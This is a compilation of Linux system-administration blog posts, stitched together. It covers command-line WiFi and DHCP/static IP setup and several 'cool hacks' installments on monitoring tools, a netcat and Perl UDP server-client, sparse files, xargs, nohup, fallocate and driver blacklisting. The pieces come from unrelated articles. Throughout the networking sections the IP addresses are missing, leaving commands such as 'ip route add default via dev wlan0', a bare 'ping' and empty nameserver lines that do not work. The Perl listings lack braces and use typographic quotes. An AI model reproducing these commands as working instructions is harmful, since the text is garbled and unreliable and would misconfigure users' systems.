root@kali:~# iw wlan0 scan
root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
root@kali:~# wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf
root@kali:~# iw wlan0 link
root@kali:~# dhclient wlan0
root@kali:~# ping
(Where wlan0 is wifi adapter and blackMOREOps is SSID)
(Add Routing manually)
root@kali:~# ip route add default via dev wlan0

At the end of it, you should be able to connect to WiFi network. Depending on the Linux distro you are using and how things go, your commands might be slightly different. Edit commands as required to meet your needs.

Setup DHCP Or Static IP Address From Command Line In Linux

Did you ever had trouble with Network Manager and felt that you need to try to setup DHCP orstatic IP address from command Line in Linux? I once accidentally removed Gnome (my bad, wasn’t paying attention and did an apt-get autoremove -y .. how bad is that.. ) So I was stuck, I couldn’t connect to Internet to reinstall my Gnome Network Manager because I’m in TEXT modenetwork-manager was broken.  I learned a good lesson. you need internet for almost anything these days unless you’ve memorized all those manual command.

This guide will guide you on how to setup DHCP or static IP address from command Line in Linux. It saved me when I was in trouble, hopefully you will find it useful as well.

Note that my network interface is eth0 for this whole guide. Change eth0 to match your network interface.

Static assignment of IP addresses is typically used to eliminate the network traffic associated with DHCP/DNS and to lock an element in the address space to provide a consistent IP target.

Step 1 : STOP and START Networking service

Some people would argue restart would work, but I prefer STOP-START to do a complete rehash. Also if it’s not working already, why bother?

# /etc/init.d/networking stop
 [ ok ] Deconfiguring network interfaces...done.
 # /etc/init.d/networking start
 [ ok ] Configuring network interfaces...done.

Step 2 : STOP and START Network-Manager

If you have some other network manager (i.e. wicd, then start stop that one).

# /etc/init.d/network-manager stop
 [ ok ] Stopping network connection manager: NetworkManager.
 # /etc/init.d/network-manager start
 [ ok ] Starting network connection manager: NetworkManager.

Just for the kicks, following is what restart would do:

 # /etc/init.d/network-manager restart
 [ ok ] Stopping network connection manager: NetworkManager.
 [ ok ] Starting network connection manager: NetworkManager.

Step 3 : Bring up network Interface

Now that we’ve restarted both networking and network-manager services, we can bring our interface eth0 up. For some it will already be up and useless at this point. But we are going to fix that in next few steps.

# ifconfig eth0 up 
# ifup eth0

The next command shows the status of the interface. as you can see, it doesn’t have any IP address assigned to it now.

 # ifconfig eth0
 eth0      Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Setup DHCP or static IP address from command Line in Linux - blackMORE Ops - 6

Step 4 : Setting up IP address – DHCP or Static?

Now we have two options. We can setup DHCP or static IP address from command Line in Linux. If you decide to use DHCP address, ensure your Router is capable to serving DHCP. If you think DHCP was the problem all along, then go for static.

Again, if you’re using static IP address, you might want to investigate what range is supported in the network you are connecting to. (i.e. some networks uses, some uses etc. ranges). For some readers, this might be trial and error method, but it always works.

Step 4.1 – Setup DHCP from command Line in Linux

Assuming that you’ve already completed step 1,2 and 3, you can just use this simple command

The first command updates/etc/network/interfaces file with eth0 interface to use DHCP.

# echo “iface eth0 inet dhcp” >>/etc/network/interfaces

The next command brings up the interface.

# ifconfig eth0 up 
# ifup eth0

With DHCP, you get IP address, subnet mask, broadcast address, Gateway IP and DNS ip addresses. Go to step xxx to test your internet connection.

Step 4.2 – Setup static IP, subnet mask, broadcast address in Linux

Use the following command to setup IP, subnet mask, broadcast address in Linux. Note that I’ve highlighted the IP addresses in red. You will be able to find these details from another device connected to the network or directly from the router or gateways status page. (i.e. some networks uses, some uses etc. ranges)

 # ifconfig eth0
 # ifconfig eth0 netmask
 # ifconfig eth0 broadcast

Next command shows the IP address and details that we’ve set manually.

# ifconfig eth0
 eth0     Link encap:Ethernet  HWaddr aa:bb:cc:11:22:33
 inet addr:  Bcast:  Mask:
 RX packets:19325 errors:0 dropped:0 overruns:0 frame:0
 TX packets:19641 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Because we are doing everything manually, we also need to setup the Gateway address for the interface. Use the following command to add default Gateway route to eth0.

# route add default gw eth0

We can confirm it using the following command:

# route -n
 Kernel IP routing table
 Destination     Gateway         Genmask         Flags Metric Ref    Use Iface         UG    0      0        0 eth0   U     0      0        0 eth0

Step 4.3 – Alternative way of setting Static IP in a DHCP network

If you’re connected to a network where you have DHCP enabled but want to assign a static IP to your interface, you can use the following command to assign Static IP in a DHCP network, netmask and Gateway.

# echo -e “iface eth0 inet dhcp\n address\n netmask\n gateway″>>/etc/network/interfaces 

At this point if your network interface is not up already, you can bring it up.

# ifconfig eth0 up 
# ifup eth0

Step 4.4 –  Fix missing default Gateway

Looks good to me so far. We’re almost there.

Try to ping (cause if is down, Internet is broken!):

# ping
 PING ( 56(84) bytes of data.
 64 bytes from ( icmp_req=1 ttl=49 time=520 ms
 64 bytes from ( icmp_req=2 ttl=49 time=318 ms
 64 bytes from ( icmp_req=3 ttl=49 time=358 ms
 64 bytes from ( icmp_req=4 ttl=49 time=315 ms
 --- ping statistics ---
 4 packets transmitted, 4 received, 0% packet loss, time 3002ms
 rtt min/avg/max/mdev = 315.863/378.359/520.263/83.643 ms

It worked!

Step 5 : Setting up nameserver / DNS

For most users step 4.4 would be the last step. But in case you get a DNS error you want to assign DNS servers manually, then use the following command:

# echo “nameserver\n nameserver″ >>/etc/resolv.conf

This will add Google Public DNS servers to your resolv.conf file. Now you should be able to ping or browse to any website.


Losing internet connection these days is just painful because we are so dependent on Internet to find usable information. It gets frustrating when you suddenly lose your GUI and/or your Network Manager and all you got is either an Ethernet port or Wireless card to connect to the internet. But then again you need to memorize all these steps.

I’ve tried to made this guide as much generic I can, but if you have a suggestion or if I’ve made a mistake, feel free to comment. Thanks for reading. Please share & RT.

Linux hacks you probably did not know about

This article is a compilation of several interesting, unique command-line tricks that should help you squeeze more juice out of your system, improve your situational awareness of what goes on behind the curtains of the desktop, plus some rather unorthodox solutions that will melt the proverbial socks off your kernel.

Follow me for a round of creative administrative hacking.

1. Run top in batch mode

top is a handy utility for monitoring the utilization of your system. It is invoked from the command line and it works by displaying lots of useful information, including CPU and memory usage, the number of running processes, load, the top resource hitters, and other useful bits. By default, top refreshes its report every 3 seconds.


Most of us use top in this fashion; we run it inside the terminal, look on the statistics for a few seconds and then graciously quit and continue our work.

But what if you wanted to monitor the usage of your system resources unattended? In other words, let some system administration utility run and collect system information and write it to a log file every once in a while. Better yet, what if you wanted to run such a utility only for a given period of time, again without any user interaction?

There are many possible answers:

  • You could schedule a job via cron.
  • You could run a shell script that runs ps every X seconds or so in a loop, incrementing a counter until the desired number of interactions elapsed. But you would also need uptime to check the load and several other commands to monitor disk utilization and what not.

Instead of going wild about trying to patch a script, there’s a much, much simpler solution: top in batch mode.

top can be run non-interactively, in batch mode. Time delay and the number of iterations can be configured, giving you the ability to dictate the data collection as you see fit. Here’s an example:

top -b -d 10 -n 3 >> top-file

We have top running in batch mode (-b). It’s going to refresh every 10 seconds, as specified by the delay (-d) flag, for a total count of 3 iterations (-n). The output will be sent to a file. A few screenshots:

Batch mode 1

Batch mode 2

And that does the trick. Speaking of writing to files …

2. Write to more than one file at once with tee

In general, with static data, this is not a problem. You simply repeat the write operation. With dynamic data, again, this is not that much of a problem. You capture the output into a temporary variable and then write it to a number of files. But there’s an easier and faster way of doing it, without redirection and repetitive write operations. The answer: tee.

tee is a very useful utility that duplicates pipe content. Now, what makes tee really useful is that it can append data to existing files, making it ideal for writing periodic log information to multiple files at once.

Here’s a great example:

ps | tee file1 file2 file3

That’s it! We’re sending the output of the ps command to three different files! Or as many as we want. As you can see in the screenshots below, all three files were created at the same time and they all contain the same data. This is extremely useful for constantly changing output, which you must preserve in multiple instances without typing the same commands over and over like a keyboard-loving monkey.

tee 1

tee 2

tee 3

Now, if you wanted to append data to files, that is periodically update them, you would use the -a flag, like this:

ps | tee -a file1 file2 file3 file4

3. Unleash the accounting power with pacct

Did you know that you can log the completion of every single process running on your machine? You may even want to do this, for security, statistical purposes, load optimization, or any other administrative reason you may think of. By default, process accounting (pacct) may not be activated on your machine. You might have to start it:

/usr/sbin/accton /var/account/pacct

Once this is done, every single process will be logged. You can find the logs under /var/account. The log itself is in binary form, so you will have to use a dumping utility to convert it to human-readable form. To this end, you use the dump-acct utility.

dump-acct pacct

The output may be very long, depending on the activity on your machine and whether you rotate the logs, which you should, since the accounting logs can inflate very quickly.


And there you go, the list of all processes ran on our host since the moment we activated the accounting. The output is printed in nice columns and includes the following, from left to right: process name, user time, system time, effective time, UID, GID, memory, and date. Other ways of starting accounting may be in the following forms:

/etc/init.d/psacct start


/etc/init.d/acct start

In fact, starting accounting using the init script is the preferred way of doing things. However, you should note that accounting is not a service in the typical form. The init script does not look for a running process – it merely checks for the lock file under /var. Therefore, if you turn the accounting on/off using the accton command, the init scripts won’t be aware of this and may report false results.

BTW, turning accounting off with accton is done just like that:


When no file is specified, the accounting is turned off. When the command is run against a file, as we’ve demonstrated earlier, the accounting process is started. You should be careful when activating/deactivating the accounting and stick to one method of management, either via the accton command or using the init scripts.

4. Dump utmp and wtmp logs

Like pacct, you can also dump the contents of the utmp and wtmp files. Both these files provide login records for the host. This information may be critical, especially if applications rely on the proper output of these files to function.

Being able to analyze the records gives you the power to examine your systems in and out. Furthermore, it may help you diagnose problems with logins, for example, via VNC or ssh, non-console and console login attempts, and more.

You can dump the logs using the dump-utmp utility. There is no dump-wtmp utility; the former works for both.

Dump utmp

You can also do the following:

dump-utmp /var/log/wtmp

Here’s what the sample file looks like:

utmp log

5. Monitor CPU and disk usage with iostat

Would you like to know how your hard disks behave? Or how well does your CPU churn? iostat is a utility that reports statistics for CPU and I/O devices on your system. It can help you identify bottlenecks and mis-tuned kernel parameters, allowing you to boost the performance of your machine.

On some systems, the utility will be installed by default. Ubuntu 9.04, for example, requires that you installsysstat package, which, by the way, contains several more goodies that we will soon review:

Install sysstat

Then, we can start monitoring the performance. I will not go into details what each little bit of displayed information means, but I will focus on one item: the first output reported by the utility is the average statistics since the last reboot.

Here’s a sample run of iostat:

iostat -x 10 10

The utility runs 10 times, every 10 seconds, reporting extended (-x) statistics. Here’s what the sample output to terminal looks like:

iostat example

6. Monitor memory usage with vmstat

vmstat does the similar job, except it works with the virtual memory statistics. For Windows users, please note the term virtual does not refer to the pagefile, i.e. swap. It refers to the logical abstraction of memory in kernel, which is then translated into physical addresses.

vmstat reports information about processes, memory, paging, block IO, traps, and CPU activity. Again, it is very handy for detecting problems with system performance. Here’s a sample run of vmstat:

vmstat -x 10 10

The utility runs 10 times, reporting every 1 second. For example, we can see that out system has taken some swap, but it’s not doing anything much with it, there’s approx. 35MB free memory and there’s very little I/O activity, as there are no blocked processes. The CPU utilization spikes from just a few percents to almost 90% before calming down.

Nothing specially exciting, but in critical situations, this kind of information can be critical.

vmstat example

7. Combine the power of iostat and vmstat with dstat

dstat aims to replace vmstat, iostat and ifstat combined. It also offers exporting data into .csv files that can then be analyzed using spreadsheet software. dstat uses a pleasant color output in the terminal:


Plus you can make really nice graphs. The spike in the graph comes from opening the Firefox browser, for instance.



8. Collect, report or save system activity information with sar

sar is another powerful, versatile system. It is a sort of a jack o’ all trades when it comes to monitoring and logging system activity. sar can be very useful for trying to analyze strange system problems where normal logs like boot.msg, messages or secure under /var/log do not yield too much information. sar writes the daily statistics into log files under /var/log/sa. Like we did before, we can monitor CPU utilization, every 2 seconds, 10 times:

sar -u 2 10

CPU example

Or you may want to monitor disk activity (10 iterations, every 5 seconds):

sar -d 5 10

Disk example

Now for some really cool stuff …

9. Create UDP server-client – version 1

Here’s something radical: create a small UDP server that listens on a port. Then configure a client to send information to the server. All this without root access!

Configure server with netcat

netcat is an incredibly powerful utility that can do just about anything with TCP or UDP connections. It can open connections, listen on ports, scan ports, and much more, all this with both IPv4 and IPv6.

In our example, we will use it to create a small UDP server on one of the non-service ports. This means we won’t need root access to get it going.

netcat -l -u -p 42000

Here’s what we did:

-l tells netcat to listen, -u tells it to use UDP, -p specifies the port (42000).

Netcat idle

We can indeed verify with netstat:

netstat -tulpen | grep 42000

And we have an open port:


Configure client

Now we need to configure the client. The big question is how to tell our process to send data to a remote machine, to a UDP port? The answer is quite simple: open a file descriptor that points to the remote server. Here’s the actual BASH script that we will use to test our connection:

Client script

The most interesting bit is the line that starts with exec.

exec 104<> /dev/udp/$1

We created a file descriptor 104 that points to our server. Now, it is possible that the file descriptor number 104 might already be in use, so you may want to check first with lsof or randomize the choice of the descriptor. Furthermore, if you have a name resolution mechanism in place, you can use a hostname instead of an IP. If you wanted to use a TCP connection, you would use /dev/tcp.

The choice of the port is defined by the $1 variable, passed as a command-line argument. You can hard code it – or make everything configurable by the user at runtime. The rest of the code is unimportant; we do something and then send information to our file descriptor, without really caring what it is. Again, we need no root access to do this.

Test connection

Now, we can see the server-client connection in action. Our server is a Ubuntu 8.10 machine, while our client is a Fedora 11. We ran the script on the client:

Script running

And watch the command-line on the server:

Server working

To make it even more exciting, I’ve created a small Flash demo with Wink. You are welcome to play the file, if you’re interested:

Cool, eh?

10. Configure UDP server-client – version 2

The limitation with the exercise above is that we do not control over some of the finer aspects of our connection. Furthermore, the connection is limited to a single end-point. If one client connects, others will be refused. To make things more exciting, we can improve our server. Instead of using netcat, we will write one of our own – in Perl.

Perl is a powerful programming language, very flexible, very neat. I must admin I have only recently began dabbling in it, so do not expect any miracles, but here’s one way of creating a UDP server in Perl – there are tons of other implementations available, better, smarter, faster, and more elegant.

The code is very simple. First, let’s take a look at the entire file and then examine sections of code. Here it is:


use IO::Socket;

$server = IO::Socket::INET->new(LocalPort => ‘50060’,
Proto => “udp”)
or die “Could not create UDP server on port
$server_port : $@n”;

my $datagram;
my $MAXSIZE = 16384; #buffer size

while (my $data=$server->recv($datagram,$MAXSIZE))
print $datagram;

my $logdate=`date +”%m-%d-%H:%M:%S”`;

my $filename=”file.$logdate”;
print FD $datagram;


The code begins with the standard Perl declaration. If you want extra debugging, you can add the -w flag. If you want to use strict code, then you may also want to add use strict; declaration. I warmly recommend this.

The next important bit is this one:

use IO::Socket;

This one tells Perl to use the IO::Socket object interface. You can also use IO:Socket::INET specifically for domain sockets. For more information, please check the official Perl documentation.

The next bit is the creation of the socket, i.e. server:

$server = IO::Socket::INET->new(LocalPort => ‘50060’,
Proto => “udp”)
or die “Could not create UDP server on port
$server_port : $@n”;

We are trying to open the local UDP port 50060. If this cannot be done, the script will die with a rather descriptive message.

Next, we define a variable that will take incoming data (datagram) and the buffer size. The buffer size might be limited by the network implementation or network restrictions on your router/switch or the kernel itself, so some values might not work for you.

And then, we have the server doing some hard work. It prints the data to the screen. But it also creates a log file with a time stamp and prints the data to the file as well.

The beauty of this implementation is that the server permits multiple incoming connections. Of course, you will have to decide how you want to differentiate the data sent by different clients, whether by a message header or using additional IO:Socket:INET objects like PeerAddr.

On the client side, nothing changes.


That’s it for now. This crazy collection should help you impress your boyfriends and girlfriends, evoke a smile with your peers or even your boss and help you be more detailed and productive when it comes to system administration tasks. Some of the utilities and tricks presented here are tremendously useful.

If you’re wondering what distribution you may need to be running to get these things done, don’t worry. You can get them working on all distros. Throughout this document, I demonstrated using Ubuntu 8.10, Ubuntu 9.04 and Fedora 11. Debian-based or RedHat-based, there’s something for everyone.

In the next article, we will also talk about other crazy hacks and tips, including a very, very useful utility calledsec – Simple Event Correlator. That’s just a brain teaser for now. I hope you enjoyed this article. See you around.

Hello there, dear readers. Time for the second article of highly useful, cool and fun utilities, commands, and tricks that should help you gain better productivity and understand your system better. In the first part, we learned about a whole bunch of great things, including top in batch mode, how to read process account logs, how to measure system activity with a range of programs, and how to write a simple UDP server-client.

Now, let’s see a few more tricks that will help you master a higher, cooler level of Linux knowledge and allow you to impress you significant others, including your boss.

1. Sparse files

What they be, you’re askin’. Well, sparse files are normal files – except that blocks containing only zeros are not really counted. In other words, empty space inside sparse files is just listed, without actually taking any physical space. This, in contrast to regular files, where everything is preallocated, including bits that hold no data.

If you’re a fan of virtualization, you have come across sparse files – virtual machines disks can be sparse files. If you’re creating virtual machines with, say 10GB space, but do not preallocate it, then you have witnessed sparse files in action! Dynamically expanding virtual disks are sparse files.

Sparse files have an advantage of conserving space until needed, but if you convert them back to raw format, like during the conversion of VMDK virtual disks to AM2 format for the use in Amazon EC2 cloud, then the files will be inflated back to their normal size. Now, the big question is, why sparse files, and what are they good for?

Well, sparse files are definitely useful in virtualization, but they have other uses. For example, when creating archives or copying files, you may or may not want to use the sparse option, depending on your requirements. Let’s see how we can create sparse and identify sparse files, so we can treat them accordingly.

Create sparse files

Creating sparse files is very simple. Just move the pointer to the end of the file.

dd if=/dev/zero of=file bs=1 count=0 seek=1M

For example, here we have created a zero-size file, except the metadata, which by default will take the customary block size (say 4096 bytes). But we have also moved the pointer to the end of the file, at 1M location, this creating a virtual 1MB file.

Sparse create

Now, using the ls command, you may think it’s a regular file:

Reported size

But you need the -s flag in the ls command options to really know what’s happening. The first field in the output will be the file size, in KB:


Similarly, you can use the du command to get the accurate report:

du command

Just for comparison, here’s what a real, 1MB file reports:

ls real file

du real file

Pay attention to this when working with files. Do not get confused by crazy ls readings, because you may end up with a total that exceeds the real disk size. Use the appropriate flags to get the real status.

Moreover, pay attention when working with file handling, compressing and archiving tools, like cp, tar, zip, and others. For instance, cp has an option that specifies how the sparse files should be handled.

man page

2. Having fun with atop

It’s not a spelling error, there’s no space missing between the letter a and top. atop is a top utility, with some spice. The full description is AT Computing’s System & Process Monitor, an interactive utility to view the load on a Linux system. It can do everything top does, and then some.

atop is a very useful program and you’ll fall in love instantly. The main view is very similar to the original tool, except you have more info and it’s arranged in a more intuitive fashion. You’ll also have color readings for critical percentage of resource usage.


In the bottom half of the main view, you will be able to sort the process table based on different columns, like memory or disk. Press m to sort by memory in the descending order. Press d to sort by disk activity in the descending order.



You can save data into flat files, any which way you want.


Better yet, you can also write data to logs in compressed, binary form and then parse relevant fields, compiling useful time-dependent statistics about your system load and usage, helping identify bottlenecks and problems. The manual page is very details and provides examples to get you started instantly.

For instance, the following command:

atop -w /tmp/atop.raw 30 10

will collect the raw data every thirty seconds a total of ten times. Very similar to iostat and vmstat, as we’ve seen the last time. Afterwards, you can pull out desired subsets very easily.

For example, to view the processor and disk utilization of this file in parseable format:

atop -PCPU,DSK -r /tmp/atop.raw

Here’s what the data looks like:


Now, if you don’t like the separator, just remove it with some simple sed-ing.

sed -e ‘/^SEP$/d’ /tmp/atop.raw > /tmp/f-clean.csv

Then, you can open this file in, say OpenOffice and create some impressive graphs:



3. ASCII art

ASCII art won’t make you an expert, but it can be fun. Oh, I’m not talking about using high-end tools like GIMP; anyone can do that. I’m talking about deriving fun ASCII art from the command line.

There are several ways you can achieve this, we will see two.


boxes is a neat little utility that lets you create your own command-line fortune cookies, similar to what Linux Mint does. The tool has a number of template ASCII figures available, on top of which you add your own little slogans.

boxes is available in most repositories, so go grab it. Then, start playing. For example, to have a cute little kitten write something witty in your terminal, run boxes -d cat, type your own message and hit Ctrl + D to end. Soon thereafter, a little cat will show in the terminal, along with your own message.

boxes cat

Innocent, sweet and fun.


This ominous sounding command is not one of those robots in Star Wars. It’s a utility that can convert JPEG images, any one you want, into ASCII art. Very useful and impressive.

For example, take your stock Tux. Now, the image I found was in the PNG format and jp2a does not handle these. So I had to convert the image to JPEG first.


And then, just run the command against the image name and Voila! Tux is your uncle!

Tux converted

4. xargs

xargs sounds like a peon curse from Warcraft I-III, but it’s in fact a very powerful and useful command that builds and executes commands from the standard input. In other words, when you use complex chains of commands in Linux, sometimes separated by the pipe symbol (|), you may want to feed the output of the last command into the input of the next one. But things can get complicated.

Luckily, xargs can do everything you need. Let’s see a few simple examples.

Example 1:

We will display all the users listed in the /etc/passwd file. Then, we will sort them and print them to the console, each on a separate line.

The command we need is:

cut -d: -f1 < /etc/passwd | sort | xargs echo |
tr ‘ ‘ ‘\n’

Example 1

xargs takes the list of usernames, one by one, echoes them to the console, while the tr command separates into each line, replacing the space delimiter with a new line feed.

Example 2:

Here’s another example. xargs is particularly useful when run with the find command and quite often sed. Let’s say you want to find a list of certain files in your directory and then manipulate them, including changing their permissions, deleting them or just listing them.

With xargs, you can make this affair a one-liner.

find . -type f -print0 | xargs -0 ls

Example 2

Here we’re using xargs with the -0 flag, which instructs it to ignore whitespaces and treat slashes and backslashes literally, making it quite useful if you expect your files to contain quotes, spaces and other exotic characters. To do this, xargs requires the find command to provide input in the right format, which is exactly what the -print0 flag does.

If you’re not convinced xargs is mighty, try doing a few exercises without it and see if you can manage to get the job done in a single line of shell code.

5. Swapon/swapoff

Another allegory, Karate Kid. Wax on, wax off. Except that we’re dealing with the command that handles swap files on Linux. I do not know how often you will have to handle swap manually, but if you’re using live CDs or work with RAID, then you just might.

swapon/swapoff allows you to turn on/off swap devices, set their priority and just plain list them. Changing the priority could be useful if you have swaps of different sizes or set on disks with different speeds.

For example, to view all swap devices:

swapon -s

A screenshot of a typical output:


And sometimes, you just may want to turn swap off. For example, swap may be used by the live CD, preventing you from unmounting the disk for partitioning, which could lead to errors. In this case, a simple swapoff will do the trick.

Speaking of disks and speeds …

6. Use ramdisk for lightning-fast execution

RAM is not cheap and you should not waste it as simple storage space if you need not to, but sometimes, just sometimes, you may be in a bit of a hurry and would like to get your project completed as soon as possible. If your work entails quite a bit of disk activity, which is usually the bottleneck of the program execution on modern machines, then using a ramdisk could help.

ramdisk is a file system created in the system memory (RAM) and treated as a regular disk device, hence its name. For all practical purposes, if you give someone a system with a RAM disk, they won’t know the difference, except the speed. ramdisks are much faster.

Here’s a little demo.

First, let’s create a ramdisk (as root or sudo):

sudo mount -t tmpfs none /tmp/ramdisk -o size=50M


We created a 50M disk and mounted it under /tmp/ramdisk. And now, let’s compare some basic writes …

Normal disk:


RAM disk:


Of course, the results will depend on many factors, including system load, disk type and speed, memory type and speed, and whatnot, but even my 23-second demonstration shows that using ramdisk you can boost your performance by 50% of more. And if you attempt repetitive serial tasks like copy, you will be able to improve your execution time by perhaps an order of magnitude.

7. Perl timeout (alarm) function

Again, Perl as the last item. Now, I have to reiterate, I’m not a skilled Perl writer. I am a cunning linguist and a master debater, but my Perl skills are moderate, so don’t take my perling advice as a holy grail. But you should definitely be familiar with the timeout function, or rather – alarm.

Why alarm?

Well, it allows you to gracefully terminate a process with SIGALARM after a given timeout period, without having your program stuck forever, waiting for something to happen.

Now, let’s see an example. If you’ve read my strace article, then this little demo should remind you of some of the things we’ve seen there.


use strict;
my $debug=1;

eval {
local $SIG{ALRM} = sub { die “alarm\n” }; # NB: \n required
alarm 5; # timeout after 5 seconds without response
system(“/bin/ping -c 1 @ARGV[0] > /dev/null”);
alarm 0;

if ($@) {
die unless $@ eq “alarm\n”;   # propagate unexpected errors
print “\nWe could not ping the desired address!\n\n” if $debug;
# timed out

else {
print “\nWe’re good!\n\n” if $debug;

What do we have here? Well, a rather simple program. Let’s examine the different bits separately. The first few lines are quite basic. We have the perl declaration, the use of strict coding, which is always recommended, and a debug flag, which will print all kinds of debugging messages when set to true. Rather useful when testing your own stuff.

Next, the eval function, which tells the program to die with ALRM signal if the desired functionality is not achieved within the given time window (in seconds). Our example is a simple ping command, which takes the IP address as the input argument and tries to get a reply within five seconds.

eval {
local $SIG{ALRM} = sub { die “alarm\n” }; # NB: \n required
alarm 5; # timeout after 5 seconds without response
system(“/bin/ping -c 1 @ARGV[0] > /dev/null”);
alarm 0;

Next, we set the program to exit if there are error messages ($@), printing a message to the user that informs him/er that we could not ping the desired address. What more, if the program execution got botched for some reason other than our timed alarm, we will terminate the execution, thus covering all angles. If successful, we continue with our work, plus some encouraging messages.

if ($@) {
die unless $@ eq “alarm\n”;   # propagate unexpected errors
print “\nWe could not ping the desired address!\n\n” if $debug;
# timed out

else {
print “\nWe’re good!\n\n” if $debug;

Some screenshots … Here’s the perl code. P.S. Just noticed the 10 seconds in the comment after alert 5; Well, it’s an innocent error, but it does not affect the code, so you can ignore it.


Then, we have a good example:


And a bad one:


And just to show you it’s a five-second timeout we’re talking about, I’ve used the time command to … well, time the execution of the script run:


ping is just a silly example, but you can use other, more complex functions. For example, mount commands. In combination with strace, which we’ve seen a few weeks ago, you can have a powerful trapping mechanism for efficient system debugging.

To read more about alarm, try the official documentation: perldoc -f alarm. To this end, you will need the perl documentation package installed on your system.

Why this exercise?

Well, it emphasizes the importance of proper checks when coding programs that use external inputs and outputs to work. Since you cannot guarantee that the other bits of code will cooperate with yours, you need to place failsafe checks to make sure you can gracefully complete the run without getting stuck. Along with input validation, timeouts and error exits are an integral part of cavalier programming.


That’s it, seven lovelies this time. A magnificent seven. I did promise you sec, but it’s too large to be just a bullet item. We will have a separate article soon, probably as a super-duper admin tool.

Anyhow, today you’ve learned several more useful tools, tricks and commands that should help you understand better your environment, work more smartly and be able to control and monitor your systems more effectively. Best of all, the tips given do not really require any specific platform. Any Linux will do. I used openSUSE 11.2, Ubuntu Jaunty and Ubuntu Karmic for these demos.

I hope you appreciate the combined effort. Stay tuned for more. We’ll have several more compilations as well as dedicated, detailed articles on some of the more powerful programs available, including both mid-end and high-end tools, as well as advanced system debugging utilities.

Welcome to the third installment in the Linux cool hacks series. Like the previous two, this article is all about cool things you can do with your Linux that are not well known and yet rather useful. When I say cool, this applies to laughing hard at XKCD’s sudo make me a sandwich style of people rather than someone wearing Zara flipflops, although those are not mutually exclusive.

Anyhow, we’ve had some 17 tips so far. Let’s try a few more. I will demonstrate using Ubuntu, openSUSE andCentOS, to show you that the choice of the system does not really make much difference. So please join me. Tomorrow, after having read and practiced these tricks, you will be able to impress your significant others and colleagues and there ought to be much rejoicing.

1. Show (kernel) functions in ps output

This is an interesting need. Say you have a program that is misbehaving. You do not want or cannot attach the debugger to it, as you fear you may disrupt some delicate time-race condition or possibly even crash the application. Or it may be stuck in a non-debuggable state. Or it may not have symbols or deny ptrace hooks or who knows what else. All in all, lots of geek lingo, the bottom line is, you just want to know at what stage the execution of the software is stuck, in the quickest, least intrusive way possible. ps will do.

This one specific example is even written in the man page:

ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:14,comm

And you will be able to see in the WCHAN column, the last function being used by your process. Most of the time, this will be completely meaningless, but if you have an inkling of understanding how your process ought to behave or you might be a developer, this could be useful information.

ps, wchan

2. Nohup

Nohup is a special Linux command that lets you detach processes from their shell, allowing them to run in what you might want to refer to as the background service mode. Indeed, if you take a look at the process table (ps), you will see a lot of processes that were spawned by the system and run without a tty.

When you start a program from the command line, it will live within the shell of your terminal window, even if you background it with &. When you kill the shell, all of its children processes will die too. In a few select cases, we want to avoid this, so we need a mechanism that will detach processes from their shell. A simple method is to create a startup script and add it to /etc/init.d, but this should really be reserved to services.

So nohup will daemonize our processes – make them daemons. Sounds scary, but it’s just geek lingo designed to impress girls. Anyhow, nohup is invoked against the desired binary or script. You need a full path if the binary or script are not presented in the PATH. You must also background nohup itself, so that it detached from the shell.

nohup <command> &

Nohup will redirect the output to nohup.out in the current directory. You should also make sure to use the proper redirection for the standard input, output and error to avoid hangs.

Here’s an example. Notice that runs without a terminal, as denoted by ? in the sixth column. For instance, the grep command runs on the virtual terminal pts/3. Moreover, is parented by init (PID = 1). And you can also see the nohup output, which is just a silly echo in this example.


3. Fallocate

Fallocate sounds a meme, but it is a very neat command that can save you a lot of time. To prove that, let me ask you a question first. What do you do if you need to create a very large file, which cannot be sparse? You use dd and source the bit stream from /dev/zero, but this takes a long time. It’s normally limited by the device speed, which is about 80MB/s for most disks. So if you need to create an 80GB file, you will need some twenty minutes to do that, in the best case. With USB connections and slower disks, this can grow to 40 minutes or longer. fallocate solves the problem by preallocating blocks instantly.

This is a relatively new command and system call in the Linux kernel, available since revision 2.6.23. All right, let us demonstrate.

First, we create a 10MB file. Nothing special. But then, to show you how powerful this command really is, we will compare with dd. While files this small could easily be written to disk cache, masking the true speed, the demonstration is powerful enough without having to use large files.

fallocate -l 10m 10mbfile


Now, the comparison. Notice the actual time differences between fallocate and dd. Even for such a tiny file, the difference is huge. fallocate is some 70 times faster in terms of system time, even though the entire operation took a fraction of the second.

fallocate speed

dd speed

Now, fallocate will remain as fast, without any regard to file size, while dd times will increase. When you have to create files that are several GB is size or much larger, you will appreciate this capability. For example, you may need to create swap files in this manner and preallocate them to partitions during the installation setup. You might not be able to wait long minutes or possibly hours for this operation to complete. Fallocate resolves the problem.

4. Debug filesystems (debugfs)

Debugfs is an interactive tool for managing EXT filesystems. Invoked from the command line, it allows you to change the mode, block size, write to the superblock, force the filesystem to execute specific commands, and more. Naturally, this kind of work means you know what you’re doing and you’re well aware of the potential hazards of data corruption when working against devices and their filesystems in a sort of live operation mode.

debugfs is invoked against the desired target device. By default, it will open the filesystem in read-only mode, as a precaution. This is quite useful for trying to salvage data from corrupted filesystems. Other commands that come into mind when trying to work with filesystems include tune2fs and resize2fs.


5. Blacklisting drivers

The Linux kernel comes with a ton of drivers, some compiled into the kernel, during the kernel compilation, which is done by specifying Y, some available as dynamically loadable modules, which is done by specifying M. The modules will later show under /lib/modules, matching your kernel.

Now, the kernel footprint could be big and contain too many drivers that you do not need or even contain conflicting drivers that interfere with your work. For instance, you might not want ipv6, which is something we tried in my Realtek network troubleshooting on Kubuntu Natty on my latest desktop, or perhaps you might not want the Nouveau graphics driver, as it conflicts with the Nvidia driver and prevents its installation, as we have seen in my CentOS Nvidia guide.

There are several ways you can disable drivers – by blacklisting them. Not a new thing, we’ve done the same back in 2006 with my Linux guide of highly useful configurations. You can make permanent changes by editing files on your system or pass parameters to the kernel commandline in the GRUB menu.

Using the CentOS example, you can disable the Nouveau driver by appending the following string to the kernel command line:

kernel /boot/vmlinuz <all kinds of options> rdblacklist=nouveau

